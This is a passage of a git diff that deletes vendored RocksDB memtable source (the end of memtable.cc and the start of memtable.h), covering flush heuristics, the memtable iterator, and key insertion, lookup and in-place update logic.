-    if (usage >= port::kMaxSizet - total_usage) {
-      return port::kMaxSizet;
-    }
-    total_usage += usage;
-  }
-  // otherwise, return the actual usage
-  return total_usage;
-}
-
-bool MemTable::ShouldFlushNow() const {
-  size_t write_buffer_size = write_buffer_size_.load(std::memory_order_relaxed);
-  // In a lot of times, we cannot allocate arena blocks that exactly matches the
-  // buffer size. Thus we have to decide if we should over-allocate or
-  // under-allocate.
-  // This constant variable can be interpreted as: if we still have more than
-  // "kAllowOverAllocationRatio * kArenaBlockSize" space left, we'd try to over
-  // allocate one more block.
-  const double kAllowOverAllocationRatio = 0.6;
-
-  // If arena still have room for new block allocation, we can safely say it
-  // shouldn't flush.
-  auto allocated_memory = table_->ApproximateMemoryUsage() +
-                          range_del_table_->ApproximateMemoryUsage() +
-                          arena_.MemoryAllocatedBytes();
-
-  // if we can still allocate one more block without exceeding the
-  // over-allocation ratio, then we should not flush.
-  if (allocated_memory + kArenaBlockSize <
-      write_buffer_size + kArenaBlockSize * kAllowOverAllocationRatio) {
-    return false;
-  }
-
-  // if user keeps adding entries that exceeds write_buffer_size, we need to
-  // flush earlier even though we still have much available memory left.
-  if (allocated_memory >
-      write_buffer_size + kArenaBlockSize * kAllowOverAllocationRatio) {
-    return true;
-  }
-
-  // In this code path, Arena has already allocated its "last block", which
-  // means the total allocatedmemory size is either:
-  //  (1) "moderately" over allocated the memory (no more than `0.6 * arena
-  // block size`. Or,
-  //  (2) the allocated memory is less than write buffer size, but we'll stop
-  // here since if we allocate a new arena block, we'll over allocate too much
-  // more (half of the arena block size) memory.
-  //
-  // In either case, to avoid over-allocate, the last block will stop allocation
-  // when its usage reaches a certain ratio, which we carefully choose "0.75
-  // full" as the stop condition because it addresses the following issue with
-  // great simplicity: What if the next inserted entry's size is
-  // bigger than AllocatedAndUnused()?
-  //
-  // The answer is: if the entry size is also bigger than 0.25 *
-  // kArenaBlockSize, a dedicated block will be allocated for it; otherwise
-  // arena will anyway skip the AllocatedAndUnused() and allocate a new, empty
-  // and regular block. In either case, we *overly* over-allocated.
-  //
-  // Therefore, setting the last block to be at most "0.75 full" avoids both
-  // cases.
-  //
-  // NOTE: the average percentage of waste space of this approach can be counted
-  // as: "arena block size * 0.25 / write buffer size". User who specify a small
-  // write buffer size and/or big arena block size may suffer.
-  return arena_.AllocatedAndUnused() < kArenaBlockSize / 4;
-}
-
-void MemTable::UpdateFlushState() {
-  auto state = flush_state_.load(std::memory_order_relaxed);
-  if (state == FLUSH_NOT_REQUESTED && ShouldFlushNow()) {
-    // ignore CAS failure, because that means somebody else requested
-    // a flush
-    flush_state_.compare_exchange_strong(state, FLUSH_REQUESTED,
-                                         std::memory_order_relaxed,
-                                         std::memory_order_relaxed);
-  }
-}
-
-void MemTable::UpdateOldestKeyTime() {
-  uint64_t oldest_key_time = oldest_key_time_.load(std::memory_order_relaxed);
-  if (oldest_key_time == std::numeric_limits<uint64_t>::max()) {
-    int64_t current_time = 0;
-    auto s = env_->GetCurrentTime(&current_time);
-    if (s.ok()) {
-      assert(current_time >= 0);
-      // If fail, the timestamp is already set.
-      oldest_key_time_.compare_exchange_strong(
-          oldest_key_time, static_cast<uint64_t>(current_time),
-          std::memory_order_relaxed, std::memory_order_relaxed);
-    }
-  }
-}
-
-int MemTable::KeyComparator::operator()(const char* prefix_len_key1,
-                                        const char* prefix_len_key2) const {
-  // Internal keys are encoded as length-prefixed strings.
-  Slice k1 = GetLengthPrefixedSlice(prefix_len_key1);
-  Slice k2 = GetLengthPrefixedSlice(prefix_len_key2);
-  return comparator.Compare(k1, k2);
-}
-
-int MemTable::KeyComparator::operator()(const char* prefix_len_key,
-                                        const Slice& key)
-    const {
-  // Internal keys are encoded as length-prefixed strings.
-  Slice a = GetLengthPrefixedSlice(prefix_len_key);
-  return comparator.Compare(a, key);
-}
-
-Slice MemTableRep::UserKey(const char* key) const {
-  Slice slice = GetLengthPrefixedSlice(key);
-  return Slice(slice.data(), slice.size() - 8);
-}
-
-KeyHandle MemTableRep::Allocate(const size_t len, char** buf) {
-  *buf = allocator_->Allocate(len);
-  return static_cast<KeyHandle>(*buf);
-}
-
-// Encode a suitable internal key target for "target" and return it.
-// Uses *scratch as scratch space, and the returned pointer will point
-// into this scratch space.
-const char* EncodeKey(std::string* scratch, const Slice& target) {
-  scratch->clear();
-  PutVarint32(scratch, static_cast<uint32_t>(target.size()));
-  scratch->append(target.data(), target.size());
-  return scratch->data();
-}
-
-class MemTableIterator : public InternalIterator {
- public:
-  MemTableIterator(const MemTable& mem, const ReadOptions& read_options,
-                   Arena* arena, bool use_range_del_table = false)
-      : bloom_(nullptr),
-        prefix_extractor_(mem.prefix_extractor_),
-        comparator_(mem.comparator_),
-        valid_(false),
-        arena_mode_(arena != nullptr),
-        value_pinned_(
-            !mem.GetImmutableMemTableOptions()->inplace_update_support) {
-    if (use_range_del_table) {
-      iter_ = mem.range_del_table_->GetIterator(arena);
-    } else if (prefix_extractor_ != nullptr && !read_options.total_order_seek) {
-      bloom_ = mem.prefix_bloom_.get();
-      iter_ = mem.table_->GetDynamicPrefixIterator(arena);
-    } else {
-      iter_ = mem.table_->GetIterator(arena);
-    }
-  }
-
-  ~MemTableIterator() {
-#ifndef NDEBUG
-    // Assert that the MemTableIterator is never deleted while
-    // Pinning is Enabled.
-    assert(!pinned_iters_mgr_ ||
-           (pinned_iters_mgr_ && !pinned_iters_mgr_->PinningEnabled()));
-#endif
-    if (arena_mode_) {
-      iter_->~Iterator();
-    } else {
-      delete iter_;
-    }
-  }
-
-#ifndef NDEBUG
-  virtual void SetPinnedItersMgr(
-      PinnedIteratorsManager* pinned_iters_mgr) override {
-    pinned_iters_mgr_ = pinned_iters_mgr;
-  }
-  PinnedIteratorsManager* pinned_iters_mgr_ = nullptr;
-#endif
-
-  virtual bool Valid() const override { return valid_; }
-  virtual void Seek(const Slice& k) override {
-    PERF_TIMER_GUARD(seek_on_memtable_time);
-    PERF_COUNTER_ADD(seek_on_memtable_count, 1);
-    if (bloom_ != nullptr) {
-      if (!bloom_->MayContain(
-              prefix_extractor_->Transform(ExtractUserKey(k)))) {
-        PERF_COUNTER_ADD(bloom_memtable_miss_count, 1);
-        valid_ = false;
-        return;
-      } else {
-        PERF_COUNTER_ADD(bloom_memtable_hit_count, 1);
-      }
-    }
-    iter_->Seek(k, nullptr);
-    valid_ = iter_->Valid();
-  }
-  virtual void SeekForPrev(const Slice& k) override {
-    PERF_TIMER_GUARD(seek_on_memtable_time);
-    PERF_COUNTER_ADD(seek_on_memtable_count, 1);
-    if (bloom_ != nullptr) {
-      if (!bloom_->MayContain(
-              prefix_extractor_->Transform(ExtractUserKey(k)))) {
-        PERF_COUNTER_ADD(bloom_memtable_miss_count, 1);
-        valid_ = false;
-        return;
-      } else {
-        PERF_COUNTER_ADD(bloom_memtable_hit_count, 1);
-      }
-    }
-    iter_->Seek(k, nullptr);
-    valid_ = iter_->Valid();
-    if (!Valid()) {
-      SeekToLast();
-    }
-    while (Valid() && comparator_.comparator.Compare(k, key()) < 0) {
-      Prev();
-    }
-  }
-  virtual void SeekToFirst() override {
-    iter_->SeekToFirst();
-    valid_ = iter_->Valid();
-  }
-  virtual void SeekToLast() override {
-    iter_->SeekToLast();
-    valid_ = iter_->Valid();
-  }
-  virtual void Next() override {
-    PERF_COUNTER_ADD(next_on_memtable_count, 1);
-    assert(Valid());
-    iter_->Next();
-    valid_ = iter_->Valid();
-  }
-  virtual void Prev() override {
-    PERF_COUNTER_ADD(prev_on_memtable_count, 1);
-    assert(Valid());
-    iter_->Prev();
-    valid_ = iter_->Valid();
-  }
-  virtual Slice key() const override {
-    assert(Valid());
-    return GetLengthPrefixedSlice(iter_->key());
-  }
-  virtual Slice value() const override {
-    assert(Valid());
-    Slice key_slice = GetLengthPrefixedSlice(iter_->key());
-    return GetLengthPrefixedSlice(key_slice.data() + key_slice.size());
-  }
-
-  virtual Status status() const override { return Status::OK(); }
-
-  virtual bool IsKeyPinned() const override {
-    // memtable data is always pinned
-    return true;
-  }
-
-  virtual bool IsValuePinned() const override {
-    // memtable value is always pinned, except if we allow inplace update.
-    return value_pinned_;
-  }
-
- private:
-  DynamicBloom* bloom_;
-  const SliceTransform* const prefix_extractor_;
-  const MemTable::KeyComparator comparator_;
-  MemTableRep::Iterator* iter_;
-  bool valid_;
-  bool arena_mode_;
-  bool value_pinned_;
-
-  // No copying allowed
-  MemTableIterator(const MemTableIterator&);
-  void operator=(const MemTableIterator&);
-};
-
-InternalIterator* MemTable::NewIterator(const ReadOptions& read_options,
-                                        Arena* arena) {
-  assert(arena != nullptr);
-  auto mem = arena->AllocateAligned(sizeof(MemTableIterator));
-  return new (mem) MemTableIterator(*this, read_options, arena);
-}
-
-InternalIterator* MemTable::NewRangeTombstoneIterator(
-    const ReadOptions& read_options) {
-  if (read_options.ignore_range_deletions || is_range_del_table_empty_) {
-    return nullptr;
-  }
-  return new MemTableIterator(*this, read_options, nullptr /* arena */,
-                              true /* use_range_del_table */);
-}
-
-port::RWMutex* MemTable::GetLock(const Slice& key) {
-  static murmur_hash hash;
-  return &locks_[hash(key) % locks_.size()];
-}
-
-MemTable::MemTableStats MemTable::ApproximateStats(const Slice& start_ikey,
-                                                   const Slice& end_ikey) {
-  uint64_t entry_count = table_->ApproximateNumEntries(start_ikey, end_ikey);
-  entry_count += range_del_table_->ApproximateNumEntries(start_ikey, end_ikey);
-  if (entry_count == 0) {
-    return {0, 0};
-  }
-  uint64_t n = num_entries_.load(std::memory_order_relaxed);
-  if (n == 0) {
-    return {0, 0};
-  }
-  if (entry_count > n) {
-    // (range_del_)table_->ApproximateNumEntries() is just an estimate so it can
-    // be larger than actual entries we have. Cap it to entries we have to limit
-    // the inaccuracy.
-    entry_count = n;
-  }
-  uint64_t data_size = data_size_.load(std::memory_order_relaxed);
-  return {entry_count * (data_size / n), entry_count};
-}
-
-void MemTable::Add(SequenceNumber s, ValueType type,
-                   const Slice& key, /* user key */
-                   const Slice& value, bool allow_concurrent,
-                   MemTablePostProcessInfo* post_process_info) {
-  // Format of an entry is concatenation of:
-  //  key_size     : varint32 of internal_key.size()
-  //  key bytes    : char[internal_key.size()]
-  //  value_size   : varint32 of value.size()
-  //  value bytes  : char[value.size()]
-  uint32_t key_size = static_cast<uint32_t>(key.size());
-  uint32_t val_size = static_cast<uint32_t>(value.size());
-  uint32_t internal_key_size = key_size + 8;
-  const uint32_t encoded_len = VarintLength(internal_key_size) +
-                               internal_key_size + VarintLength(val_size) +
-                               val_size;
-  char* buf = nullptr;
-  std::unique_ptr<MemTableRep>& table =
-      type == kTypeRangeDeletion ? range_del_table_ : table_;
-  KeyHandle handle = table->Allocate(encoded_len, &buf);
-
-  char* p = EncodeVarint32(buf, internal_key_size);
-  memcpy(p, key.data(), key_size);
-  Slice key_slice(p, key_size);
-  p += key_size;
-  uint64_t packed = PackSequenceAndType(s, type);
-  EncodeFixed64(p, packed);
-  p += 8;
-  p = EncodeVarint32(p, val_size);
-  memcpy(p, value.data(), val_size);
-  assert((unsigned)(p + val_size - buf) == (unsigned)encoded_len);
-  if (!allow_concurrent) {
-    // Extract prefix for insert with hint.
-    if (insert_with_hint_prefix_extractor_ != nullptr &&
-        insert_with_hint_prefix_extractor_->InDomain(key_slice)) {
-      Slice prefix = insert_with_hint_prefix_extractor_->Transform(key_slice);
-      table->InsertWithHint(handle, &insert_hints_[prefix]);
-    } else {
-      table->Insert(handle);
-    }
-
-    // this is a bit ugly, but is the way to avoid locked instructions
-    // when incrementing an atomic
-    num_entries_.store(num_entries_.load(std::memory_order_relaxed) + 1,
-                       std::memory_order_relaxed);
-    data_size_.store(data_size_.load(std::memory_order_relaxed) + encoded_len,
-                     std::memory_order_relaxed);
-    if (type == kTypeDeletion) {
-      num_deletes_.store(num_deletes_.load(std::memory_order_relaxed) + 1,
-                         std::memory_order_relaxed);
-    }
-
-    if (prefix_bloom_) {
-      assert(prefix_extractor_);
-      prefix_bloom_->Add(prefix_extractor_->Transform(key));
-    }
-
-    // The first sequence number inserted into the memtable
-    assert(first_seqno_ == 0 || s > first_seqno_);
-    if (first_seqno_ == 0) {
-      first_seqno_.store(s, std::memory_order_relaxed);
-
-      if (earliest_seqno_ == kMaxSequenceNumber) {
-        earliest_seqno_.store(GetFirstSequenceNumber(),
-                              std::memory_order_relaxed);
-      }
-      assert(first_seqno_.load() >= earliest_seqno_.load());
-    }
-    assert(post_process_info == nullptr);
-    UpdateFlushState();
-  } else {
-    table->InsertConcurrently(handle);
-
-    assert(post_process_info != nullptr);
-    post_process_info->num_entries++;
-    post_process_info->data_size += encoded_len;
-    if (type == kTypeDeletion) {
-      post_process_info->num_deletes++;
-    }
-
-    if (prefix_bloom_) {
-      assert(prefix_extractor_);
-      prefix_bloom_->AddConcurrently(prefix_extractor_->Transform(key));
-    }
-
-    // atomically update first_seqno_ and earliest_seqno_.
-    uint64_t cur_seq_num = first_seqno_.load(std::memory_order_relaxed);
-    while ((cur_seq_num == 0 || s < cur_seq_num) &&
-           !first_seqno_.compare_exchange_weak(cur_seq_num, s)) {
-    }
-    uint64_t cur_earliest_seqno =
-        earliest_seqno_.load(std::memory_order_relaxed);
-    while (
-        (cur_earliest_seqno == kMaxSequenceNumber || s < cur_earliest_seqno) &&
-        !first_seqno_.compare_exchange_weak(cur_earliest_seqno, s)) {
-    }
-  }
-  if (is_range_del_table_empty_ && type == kTypeRangeDeletion) {
-    is_range_del_table_empty_ = false;
-  }
-  UpdateOldestKeyTime();
-}
-
-// Callback from MemTable::Get()
-namespace {
-
-struct Saver {
-  Status* status;
-  const LookupKey* key;
-  bool* found_final_value;  // Is value set correctly? Used by KeyMayExist
-  bool* merge_in_progress;
-  std::string* value;
-  SequenceNumber seq;
-  const MergeOperator* merge_operator;
-  // the merge operations encountered;
-  MergeContext* merge_context;
-  RangeDelAggregator* range_del_agg;
-  MemTable* mem;
-  Logger* logger;
-  Statistics* statistics;
-  bool inplace_update_support;
-  Env* env_;
-  bool* is_blob_index;
-};
-}  // namespace
-
-static bool SaveValue(void* arg, const char* entry) {
-  Saver* s = reinterpret_cast<Saver*>(arg);
-  MergeContext* merge_context = s->merge_context;
-  RangeDelAggregator* range_del_agg = s->range_del_agg;
-  const MergeOperator* merge_operator = s->merge_operator;
-
-  assert(s != nullptr && merge_context != nullptr && range_del_agg != nullptr);
-
-  // entry format is:
-  //    klength  varint32
-  //    userkey  char[klength-8]
-  //    tag      uint64
-  //    vlength  varint32
-  //    value    char[vlength]
-  // Check that it belongs to same user key.  We do not check the
-  // sequence number since the Seek() call above should have skipped
-  // all entries with overly large sequence numbers.
-  uint32_t key_length;
-  const char* key_ptr = GetVarint32Ptr(entry, entry + 5, &key_length);
-  if (s->mem->GetInternalKeyComparator().user_comparator()->Equal(
-          Slice(key_ptr, key_length - 8), s->key->user_key())) {
-    // Correct user key
-    const uint64_t tag = DecodeFixed64(key_ptr + key_length - 8);
-    ValueType type;
-    UnPackSequenceAndType(tag, &s->seq, &type);
-
-    if ((type == kTypeValue || type == kTypeMerge || type == kTypeBlobIndex) &&
-        range_del_agg->ShouldDelete(Slice(key_ptr, key_length))) {
-      type = kTypeRangeDeletion;
-    }
-    switch (type) {
-      case kTypeBlobIndex:
-        if (s->is_blob_index == nullptr) {
-          ROCKS_LOG_ERROR(s->logger, "Encounter unexpected blob index.");
-          *(s->status) = Status::NotSupported(
-              "Encounter unsupported blob value. Please open DB with "
-              "rocksdb::blob_db::BlobDB instead.");
-        } else if (*(s->merge_in_progress)) {
-          *(s->status) =
-              Status::NotSupported("Blob DB does not support merge operator.");
-        }
-        if (!s->status->ok()) {
-          *(s->found_final_value) = true;
-          return false;
-        }
-      // intentional fallthrough
-      case kTypeValue: {
-        if (s->inplace_update_support) {
-          s->mem->GetLock(s->key->user_key())->ReadLock();
-        }
-        Slice v = GetLengthPrefixedSlice(key_ptr + key_length);
-        *(s->status) = Status::OK();
-        if (*(s->merge_in_progress)) {
-          *(s->status) = MergeHelper::TimedFullMerge(
-              merge_operator, s->key->user_key(), &v,
-              merge_context->GetOperands(), s->value, s->logger, s->statistics,
-              s->env_, nullptr /* result_operand */, true);
-        } else if (s->value != nullptr) {
-          s->value->assign(v.data(), v.size());
-        }
-        if (s->inplace_update_support) {
-          s->mem->GetLock(s->key->user_key())->ReadUnlock();
-        }
-        *(s->found_final_value) = true;
-        if (s->is_blob_index != nullptr) {
-          *(s->is_blob_index) = (type == kTypeBlobIndex);
-        }
-        return false;
-      }
-      case kTypeDeletion:
-      case kTypeSingleDeletion:
-      case kTypeRangeDeletion: {
-        if (*(s->merge_in_progress)) {
-          *(s->status) = MergeHelper::TimedFullMerge(
-              merge_operator, s->key->user_key(), nullptr,
-              merge_context->GetOperands(), s->value, s->logger, s->statistics,
-              s->env_, nullptr /* result_operand */, true);
-        } else {
-          *(s->status) = Status::NotFound();
-        }
-        *(s->found_final_value) = true;
-        return false;
-      }
-      case kTypeMerge: {
-        if (!merge_operator) {
-          *(s->status) = Status::InvalidArgument(
-              "merge_operator is not properly initialized.");
-          // Normally we continue the loop (return true) when we see a merge
-          // operand.  But in case of an error, we should stop the loop
-          // immediately and pretend we have found the value to stop further
-          // seek.  Otherwise, the later call will override this error status.
-          *(s->found_final_value) = true;
-          return false;
-        }
-        Slice v = GetLengthPrefixedSlice(key_ptr + key_length);
-        *(s->merge_in_progress) = true;
-        merge_context->PushOperand(
-            v, s->inplace_update_support == false /* operand_pinned */);
-        return true;
-      }
-      default:
-        assert(false);
-        return true;
-    }
-  }
-
-  // s->state could be Corrupt, merge or notfound
-  return false;
-}
-
-bool MemTable::Get(const LookupKey& key, std::string* value, Status* s,
-                   MergeContext* merge_context,
-                   RangeDelAggregator* range_del_agg, SequenceNumber* seq,
-                   const ReadOptions& read_opts, bool* is_blob_index) {
-  // The sequence number is updated synchronously in version_set.h
-  if (IsEmpty()) {
-    // Avoiding recording stats for speed.
-    return false;
-  }
-  PERF_TIMER_GUARD(get_from_memtable_time);
-
-  std::unique_ptr<InternalIterator> range_del_iter(
-      NewRangeTombstoneIterator(read_opts));
-  Status status = range_del_agg->AddTombstones(std::move(range_del_iter));
-  if (!status.ok()) {
-    *s = status;
-    return false;
-  }
-
-  Slice user_key = key.user_key();
-  bool found_final_value = false;
-  bool merge_in_progress = s->IsMergeInProgress();
-  bool const may_contain =
-      nullptr == prefix_bloom_
-          ? false
-          : prefix_bloom_->MayContain(prefix_extractor_->Transform(user_key));
-  if (prefix_bloom_ && !may_contain) {
-    // iter is null if prefix bloom says the key does not exist
-    PERF_COUNTER_ADD(bloom_memtable_miss_count, 1);
-    *seq = kMaxSequenceNumber;
-  } else {
-    if (prefix_bloom_) {
-      PERF_COUNTER_ADD(bloom_memtable_hit_count, 1);
-    }
-    Saver saver;
-    saver.status = s;
-    saver.found_final_value = &found_final_value;
-    saver.merge_in_progress = &merge_in_progress;
-    saver.key = &key;
-    saver.value = value;
-    saver.seq = kMaxSequenceNumber;
-    saver.mem = this;
-    saver.merge_context = merge_context;
-    saver.range_del_agg = range_del_agg;
-    saver.merge_operator = moptions_.merge_operator;
-    saver.logger = moptions_.info_log;
-    saver.inplace_update_support = moptions_.inplace_update_support;
-    saver.statistics = moptions_.statistics;
-    saver.env_ = env_;
-    saver.is_blob_index = is_blob_index;
-    table_->Get(key, &saver, SaveValue);
-
-    *seq = saver.seq;
-  }
-
-  // No change to value, since we have not yet found a Put/Delete
-  if (!found_final_value && merge_in_progress) {
-    *s = Status::MergeInProgress();
-  }
-  PERF_COUNTER_ADD(get_from_memtable_count, 1);
-  return found_final_value;
-}
-
-void MemTable::Update(SequenceNumber seq,
-                      const Slice& key,
-                      const Slice& value) {
-  LookupKey lkey(key, seq);
-  Slice mem_key = lkey.memtable_key();
-
-  std::unique_ptr<MemTableRep::Iterator> iter(
-      table_->GetDynamicPrefixIterator());
-  iter->Seek(lkey.internal_key(), mem_key.data());
-
-  if (iter->Valid()) {
-    // entry format is:
-    //    key_length  varint32
-    //    userkey  char[klength-8]
-    //    tag      uint64
-    //    vlength  varint32
-    //    value    char[vlength]
-    // Check that it belongs to same user key.  We do not check the
-    // sequence number since the Seek() call above should have skipped
-    // all entries with overly large sequence numbers.
-    const char* entry = iter->key();
-    uint32_t key_length = 0;
-    const char* key_ptr = GetVarint32Ptr(entry, entry + 5, &key_length);
-    if (comparator_.comparator.user_comparator()->Equal(
-            Slice(key_ptr, key_length - 8), lkey.user_key())) {
-      // Correct user key
-      const uint64_t tag = DecodeFixed64(key_ptr + key_length - 8);
-      ValueType type;
-      SequenceNumber unused;
-      UnPackSequenceAndType(tag, &unused, &type);
-      if (type == kTypeValue) {
-        Slice prev_value = GetLengthPrefixedSlice(key_ptr + key_length);
-        uint32_t prev_size = static_cast<uint32_t>(prev_value.size());
-        uint32_t new_size = static_cast<uint32_t>(value.size());
-
-        // Update value, if new value size  <= previous value size
-        if (new_size <= prev_size) {
-          char* p =
-              EncodeVarint32(const_cast<char*>(key_ptr) + key_length, new_size);
-          WriteLock wl(GetLock(lkey.user_key()));
-          memcpy(p, value.data(), value.size());
-          assert((unsigned)((p + value.size()) - entry) ==
-                 (unsigned)(VarintLength(key_length) + key_length +
-                            VarintLength(value.size()) + value.size()));
-          return;
-        }
-      }
-    }
-  }
-
-  // key doesn't exist
-  Add(seq, kTypeValue, key, value);
-}
-
-bool MemTable::UpdateCallback(SequenceNumber seq,
-                              const Slice& key,
-                              const Slice& delta) {
-  LookupKey lkey(key, seq);
-  Slice memkey = lkey.memtable_key();
-
-  std::unique_ptr<MemTableRep::Iterator> iter(
-      table_->GetDynamicPrefixIterator());
-  iter->Seek(lkey.internal_key(), memkey.data());
-
-  if (iter->Valid()) {
-    // entry format is:
-    //    key_length  varint32
-    //    userkey  char[klength-8]
-    //    tag      uint64
-    //    vlength  varint32
-    //    value    char[vlength]
-    // Check that it belongs to same user key.  We do not check the
-    // sequence number since the Seek() call above should have skipped
-    // all entries with overly large sequence numbers.
-    const char* entry = iter->key();
-    uint32_t key_length = 0;
-    const char* key_ptr = GetVarint32Ptr(entry, entry + 5, &key_length);
-    if (comparator_.comparator.user_comparator()->Equal(
-            Slice(key_ptr, key_length - 8), lkey.user_key())) {
-      // Correct user key
-      const uint64_t tag = DecodeFixed64(key_ptr + key_length - 8);
-      ValueType type;
-      uint64_t unused;
-      UnPackSequenceAndType(tag, &unused, &type);
-      switch (type) {
-        case kTypeValue: {
-          Slice prev_value = GetLengthPrefixedSlice(key_ptr + key_length);
-          uint32_t prev_size = static_cast<uint32_t>(prev_value.size());
-
-          char* prev_buffer = const_cast<char*>(prev_value.data());
-          uint32_t new_prev_size = prev_size;
-
-          std::string str_value;
-          WriteLock wl(GetLock(lkey.user_key()));
-          auto status = moptions_.inplace_callback(prev_buffer, &new_prev_size,
-                                                   delta, &str_value);
-          if (status == UpdateStatus::UPDATED_INPLACE) {
-            // Value already updated by callback.
-            assert(new_prev_size <= prev_size);
-            if (new_prev_size < prev_size) {
-              // overwrite the new prev_size
-              char* p = EncodeVarint32(const_cast<char*>(key_ptr) + key_length,
-                                       new_prev_size);
-              if (VarintLength(new_prev_size) < VarintLength(prev_size)) {
-                // shift the value buffer as well.
-                memcpy(p, prev_buffer, new_prev_size);
-              }
-            }
-            RecordTick(moptions_.statistics, NUMBER_KEYS_UPDATED);
-            UpdateFlushState();
-            return true;
-          } else if (status == UpdateStatus::UPDATED) {
-            Add(seq, kTypeValue, key, Slice(str_value));
-            RecordTick(moptions_.statistics, NUMBER_KEYS_WRITTEN);
-            UpdateFlushState();
-            return true;
-          } else if (status == UpdateStatus::UPDATE_FAILED) {
-            // No action required. Return.
-            UpdateFlushState();
-            return true;
-          }
-        }
-        default:
-          break;
-      }
-    }
-  }
-  // If the latest value is not kTypeValue
-  // or key doesn't exist
-  return false;
-}
-
-size_t MemTable::CountSuccessiveMergeEntries(const LookupKey& key) {
-  Slice memkey = key.memtable_key();
-
-  // A total ordered iterator is costly for some memtablerep (prefix aware
-  // reps). By passing in the user key, we allow efficient iterator creation.
-  // The iterator only needs to be ordered within the same user key.
-  std::unique_ptr<MemTableRep::Iterator> iter(
-      table_->GetDynamicPrefixIterator());
-  iter->Seek(key.internal_key(), memkey.data());
-
-  size_t num_successive_merges = 0;
-
-  for (; iter->Valid(); iter->Next()) {
-    const char* entry = iter->key();
-    uint32_t key_length = 0;
-    const char* iter_key_ptr = GetVarint32Ptr(entry, entry + 5, &key_length);
-    if (!comparator_.comparator.user_comparator()->Equal(
-            Slice(iter_key_ptr, key_length - 8), key.user_key())) {
-      break;
-    }
-
-    const uint64_t tag = DecodeFixed64(iter_key_ptr + key_length - 8);
-    ValueType type;
-    uint64_t unused;
-    UnPackSequenceAndType(tag, &unused, &type);
-    if (type != kTypeMerge) {
-      break;
-    }
-
-    ++num_successive_merges;
-  }
-
-  return num_successive_merges;
-}
-
-void MemTableRep::Get(const LookupKey& k, void* callback_args,
-                      bool (*callback_func)(void* arg, const char* entry)) {
-  auto iter = GetDynamicPrefixIterator();
-  for (iter->Seek(k.internal_key(), k.memtable_key().data());
-       iter->Valid() && callback_func(callback_args, iter->key());
-       iter->Next()) {
-  }
-}
-
-void MemTable::RefLogContainingPrepSection(uint64_t log) {
-  assert(log > 0);
-  auto cur = min_prep_log_referenced_.load();
-  while ((log < cur || cur == 0) &&
-         !min_prep_log_referenced_.compare_exchange_strong(cur, log)) {
-    cur = min_prep_log_referenced_.load();
-  }
-}
-
-uint64_t MemTable::GetMinLogContainingPrepSection() {
-  return min_prep_log_referenced_.load();
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/memtable.h b/thirdparty/rocksdb/db/memtable.h
deleted file mode 100644
index 4f63818..0000000
--- a/thirdparty/rocksdb/db/memtable.h
+++ /dev/null
@@ -1,453 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <atomic>
-#include <deque>
-#include <functional>
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <vector>
-#include "db/dbformat.h"
-#include "db/range_del_aggregator.h"
-#include "db/version_edit.h"
-#include "monitoring/instrumented_mutex.h"
-#include "options/cf_options.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "util/allocator.h"
-#include "util/concurrent_arena.h"
-#include "util/dynamic_bloom.h"
-#include "util/hash.h"
-
-namespace rocksdb {
-
-class Mutex;
-class MemTableIterator;
-class MergeContext;
-class InternalIterator;
-
-struct ImmutableMemTableOptions {
-  explicit ImmutableMemTableOptions(const ImmutableCFOptions& ioptions,
-                                    const MutableCFOptions& mutable_cf_options);
-  size_t arena_block_size;
-  uint32_t memtable_prefix_bloom_bits;
-  size_t memtable_huge_page_size;
-  bool inplace_update_support;
-  size_t inplace_update_num_locks;
-  UpdateStatus (*inplace_callback)(char* existing_value,
-                                   uint32_t* existing_value_size,
-                                   Slice delta_value,
-                                   std::string* merged_value);
-  size_t max_successive_merges;
-  Statistics* statistics;
-  MergeOperator* merge_operator;
-  Logger* info_log;
-};
-
-// Batched counters to updated when inserting keys in one write batch.
-// In post process of the write batch, these can be updated together.
-// Only used in concurrent memtable insert case.
-struct MemTablePostProcessInfo {
-  uint64_t data_size = 0;
-  uint64_t num_entries = 0;
-  uint64_t num_deletes = 0;
-};
-
-// Note:  Many of the methods in this class have comments indicating that
-// external synchromization is required as these methods are not thread-safe.
-// It is up to higher layers of code to decide how to prevent concurrent
-// invokation of these methods.  This is usually done by acquiring either
-// the db mutex or the single writer thread.
-//
-// Some of these methods are documented to only require external
-// synchronization if this memtable is immutable.  Calling MarkImmutable() is
-// not sufficient to guarantee immutability.  It is up to higher layers of
-// code to determine if this MemTable can still be modified by other threads.
-// Eg: The Superversion stores a pointer to the current MemTable (that can
-// be modified) and a separate list of the MemTables that can no longer be
-// written to (aka the 'immutable memtables').
-class MemTable {
- public:
-  struct KeyComparator : public MemTableRep::KeyComparator {
-    const InternalKeyComparator comparator;
-    explicit KeyComparator(const InternalKeyComparator& c) : comparator(c) { }
-    virtual int operator()(const char* prefix_len_key1,
-                           const char* prefix_len_key2) const override;
-    virtual int operator()(const char* prefix_len_key,
-                           const Slice& key) const override;
-  };
-
-  // MemTables are reference counted.  The initial reference count
-  // is zero and the caller must call Ref() at least once.
-  //
-  // earliest_seq should be the current SequenceNumber in the db such that any
-  // key inserted into this memtable will have an equal or larger seq number.
-  // (When a db is first created, the earliest sequence number will be 0).
-  // If the earliest sequence number is not known, kMaxSequenceNumber may be
-  // used, but this may prevent some transactions from succeeding until the
-  // first key is inserted into the memtable.
-  explicit MemTable(const InternalKeyComparator& comparator,
-                    const ImmutableCFOptions& ioptions,
-                    const MutableCFOptions& mutable_cf_options,
-                    WriteBufferManager* write_buffer_manager,
-                    SequenceNumber earliest_seq, uint32_t column_family_id);
-
-  // Do not delete this MemTable unless Unref() indicates it not in use.
-  ~MemTable();
-
-  // Increase reference count.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  void Ref() { ++refs_; }
-
-  // Drop reference count.
-  // If the refcount goes to zero return this memtable, otherwise return null.
-  // REQUIRES: external synchronization to prevent simultaneous
-  // operations on the same MemTable.
-  MemTable* Unref() {
-    --refs_;
-    assert(refs_ >= 0);
-    if (refs_ <= 0) {
-      return this;
-    }
-    return nullptr;
-  }
-
